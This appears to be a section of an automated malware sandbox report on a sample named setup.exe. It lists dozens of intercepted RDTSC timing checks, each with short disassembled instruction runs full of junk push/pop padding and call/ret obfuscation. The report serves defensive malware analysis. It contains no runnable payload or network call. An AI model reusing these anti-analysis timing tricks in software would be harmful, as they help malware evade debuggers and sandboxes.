Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 396303 second address: 396309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A3FA0 second address: 3A3FB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A4136 second address: 3A4167 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F47D8E4826Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F47D8E48279h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A4167 second address: 3A416B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A4535 second address: 3A453B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A453B second address: 3A455C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B3h 0x00000007 jp 00007F47D8E3B0A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A455C second address: 3A4578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E48278h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A4578 second address: 3A458C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F47D8E3B0A6h 0x00000008 jnl 00007F47D8E3B0A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A4704 second address: 3A470E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F47D8E4826Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A470E second address: 3A4715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A4715 second address: 3A4723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jc 00007F47D8E48266h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A4859 second address: 3A485F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A4A23 second address: 3A4A3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E4826Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A4BB3 second address: 3A4BCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A4BCB second address: 3A4BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A4BDA second address: 3A4BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A4BDE second address: 3A4BEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E4826Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A4BEE second address: 3A4BF8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F47D8E3B0AEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A4D50 second address: 3A4D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F47D8E48266h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A4D5A second address: 3A4D60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A4D60 second address: 3A4D6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F47D8E48268h 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A4D6E second address: 3A4D9E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F47D8E3B0AAh 0x00000008 jng 00007F47D8E3B0A6h 0x0000000e pop edx 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F47D8E3B0B0h 0x00000017 pop ecx 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push esi 0x0000001b push edi 0x0000001c push edi 0x0000001d pop edi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A4D9E second address: 3A4DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A4DA7 second address: 3A4DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A4DAD second address: 3A4DB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A507C second address: 3A5089 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A51F2 second address: 3A520A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48274h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A520A second address: 3A5229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop ebx 0x0000000a popad 0x0000000b jne 00007F47D8E3B0C2h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F47D8E3B0AAh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A5229 second address: 3A522D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A522D second address: 3A5231 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A5B6C second address: 3A5B70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A5D15 second address: 3A5D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A5FFB second address: 3A600D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E4826Dh 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A600D second address: 3A6012 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3AA2E6 second address: 3AA2EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3AAAC3 second address: 3AAAE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F47D8E3B0B8h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3ABD95 second address: 3ABD99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3ABD99 second address: 3ABD9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 36E621 second address: 36E632 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F47D8E4826Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B29DA second address: 3B29DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B29DE second address: 3B29EB instructions: 0x00000000 rdtsc 0x00000002 jne 00007F47D8E48266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B2E2F second address: 3B2E3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jns 00007F47D8E3B0A6h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B2E3D second address: 3B2E41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B2E41 second address: 3B2E67 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d js 00007F47D8E3B0A6h 0x00000013 jl 00007F47D8E3B0A6h 0x00000019 popad 0x0000001a ja 00007F47D8E3B0ACh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B2F8E second address: 3B2FC3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F47D8E48266h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F47D8E48277h 0x00000011 jnc 00007F47D8E4826Ch 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B2FC3 second address: 3B2FE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F47D8E3B0B8h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B316F second address: 3B3178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 379F7F second address: 379FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 jbe 00007F47D8E3B0A6h 0x0000000e popad 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 pop edi 0x00000014 pushad 0x00000015 pushad 0x00000016 jnp 00007F47D8E3B0A6h 0x0000001c pushad 0x0000001d popad 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 push edx 0x00000022 jmp 00007F47D8E3B0B6h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B4EFE second address: 3B4F04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B54E3 second address: 3B54FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E3B0B7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B55D0 second address: 3B55E9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F47D8E48266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F47D8E4826Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B5FB4 second address: 3B5FBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B68E9 second address: 3B68F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E4826Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B72AA second address: 3B72B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B7143 second address: 3B7147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B72B0 second address: 3B730F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F47D8E3B0B3h 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F47D8E3B0A8h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a jnp 00007F47D8E3B0B2h 0x00000030 xchg eax, ebx 0x00000031 push eax 0x00000032 push edx 0x00000033 jno 00007F47D8E3B0A8h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 376B15 second address: 376B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BA247 second address: 3BA24D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BAB94 second address: 3BAC35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48279h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F47D8E48276h 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F47D8E48268h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c jmp 00007F47D8E48271h 0x00000031 push 00000000h 0x00000033 mov edi, dword ptr [ebp+122D3032h] 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push ecx 0x0000003e call 00007F47D8E48268h 0x00000043 pop ecx 0x00000044 mov dword ptr [esp+04h], ecx 0x00000048 add dword ptr [esp+04h], 00000019h 0x00000050 inc ecx 0x00000051 push ecx 0x00000052 ret 0x00000053 pop ecx 0x00000054 ret 0x00000055 mov edi, esi 0x00000057 xchg eax, ebx 0x00000058 push eax 0x00000059 push edx 0x0000005a jg 00007F47D8E4826Ch 0x00000060 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BA962 second address: 3BA973 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E3B0ADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BA973 second address: 3BA9A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48279h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F47D8E48270h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BA9A5 second address: 3BA9AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BC16E second address: 3BC188 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E48276h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BA9AB second address: 3BA9AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BC188 second address: 3BC18C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BCC65 second address: 3BCC6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BCC6A second address: 3BCC79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BCC79 second address: 3BCC83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F47D8E3B0A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C2CFF second address: 3C2D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C1D19 second address: 3C1D1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C2D03 second address: 3C2D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F47D8E4826Ch 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C3D47 second address: 3C3DAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F47D8E3B0B0h 0x0000000f nop 0x00000010 sub dword ptr [ebp+1247A6F6h], ebx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F47D8E3B0A8h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 mov ebx, dword ptr [ebp+122D322Fh] 0x00000038 push 00000000h 0x0000003a sub dword ptr [ebp+122D2CD2h], ecx 0x00000040 xchg eax, esi 0x00000041 pushad 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C2F5A second address: 3C2F68 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C5F93 second address: 3C5FB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C5FB3 second address: 3C5FB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C5FB8 second address: 3C6048 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F47D8E3B0A8h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push esi 0x00000029 call 00007F47D8E3B0A8h 0x0000002e pop esi 0x0000002f mov dword ptr [esp+04h], esi 0x00000033 add dword ptr [esp+04h], 00000014h 0x0000003b inc esi 0x0000003c push esi 0x0000003d ret 0x0000003e pop esi 0x0000003f ret 0x00000040 jmp 00007F47D8E3B0B7h 0x00000045 jmp 00007F47D8E3B0B4h 0x0000004a push 00000000h 0x0000004c mov dword ptr [ebp+122DB73Fh], edx 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 push ebx 0x00000058 pop ebx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C6048 second address: 3C604E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C61DE second address: 3C61FB instructions: 0x00000000 rdtsc 0x00000002 jne 00007F47D8E3B0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push edx 0x0000000e js 00007F47D8E3B0A6h 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jng 00007F47D8E3B0A6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C61FB second address: 3C61FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C802B second address: 3C8035 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F47D8E3B0ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C718C second address: 3C7192 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C903D second address: 3C9078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F47D8E3B0B8h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f jmp 00007F47D8E3B0B8h 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C9078 second address: 3C912F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48276h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F47D8E48268h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov bl, 91h 0x00000026 xor di, 03CBh 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push esi 0x00000030 call 00007F47D8E48268h 0x00000035 pop esi 0x00000036 mov dword ptr [esp+04h], esi 0x0000003a add dword ptr [esp+04h], 00000016h 0x00000042 inc esi 0x00000043 push esi 0x00000044 ret 0x00000045 pop esi 0x00000046 ret 0x00000047 mov di, D0D5h 0x0000004b xor ebx, 6BC0166Bh 0x00000051 mov edi, 6E2E0A33h 0x00000056 push 00000000h 0x00000058 call 00007F47D8E4826Ah 0x0000005d mov di, 9A30h 0x00000061 pop ebx 0x00000062 jl 00007F47D8E48274h 0x00000068 jmp 00007F47D8E4826Eh 0x0000006d push eax 0x0000006e push eax 0x0000006f push edx 0x00000070 pushad 0x00000071 pushad 0x00000072 popad 0x00000073 jmp 00007F47D8E48277h 0x00000078 popad 0x00000079 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C912F second address: 3C9135 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C9135 second address: 3C9139 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
